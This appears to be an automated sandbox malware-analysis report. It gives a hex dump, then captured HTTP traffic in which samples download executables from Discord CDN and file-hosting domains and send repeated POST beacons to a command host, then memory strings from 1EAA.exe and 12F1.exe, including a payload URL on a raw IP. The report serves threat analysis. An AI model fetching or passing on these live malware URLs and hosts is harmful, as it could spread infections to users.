00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 0d 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00

Source: global traffic	HTTP traffic detected: GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nbriredl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gqnrsjcd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sqdlx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ggigae.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xbbffefnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fhfscvxar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/8723_1638191106_2017.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://byrobmm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xerwbpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xbopjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jucecaeyqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nakeeqwaft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjndoeiyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hmyqurtmv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yxndp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://luuqcbcy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pxptimk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://smfbsrgxse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nabmhhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mdyfwsxro.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/6096_1638289274_6885.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kpgguo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tevvfr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aryonwruu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vefoyiify.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://guokyvqq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sdcdogt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vfrmk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tgtmtdosym.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drrwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rbuyqamdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omxkjxm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xigvfc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nwqlosscc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bkjjovqxmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/4152_1638095425_4339.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pborgy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hqppgl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybcka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://buintdmfv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://slymqhed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oamtqaba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xuobblxeto.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/5311_1638303032_7343.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://clekn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jhglqm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pnkfchg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://inflqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://obtnplqgwg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://buxkshswe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wjpbjeendw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pmhitsi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jydujxmpvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xtfcaknrkq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mtfpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com

Source: global traffic	TCP traffic: 192.168.2.4:49808 -> 45.9.20.149:42871
Source: global traffic	TCP traffic: 192.168.2.4:49830 -> 92.255.76.197:38637

Source: 1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp	String found in binary or memory: http://95.181.152.139
Source: 1EAA.exe, 00000014.00000002.972514653.0000000002B33000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961234629.0000000002950000.00000004.00000001.sdmp	String found in binary or memory: http://95.181.152.139/rrghost.exe
Source: 1EAA.exe, 00000014.00000002.973167714.0000000002C05000.00000004.00000001.sdmp	String found in binary or memory: http://95.181.152.1394hl
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1EAA.exe, 00000014.00000002.973486115.0000000002C34000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: WerFault.exe, 00000013.00000002.891900624.0000000004E80000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.988121944.000000000657B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.978818128.00000000036FD000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 12F1.exe, 00000009.00000002.974724568.0000000003231000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.959540054.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 12F1.exe, 00000009.00000002.975058199.00000000032C6000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
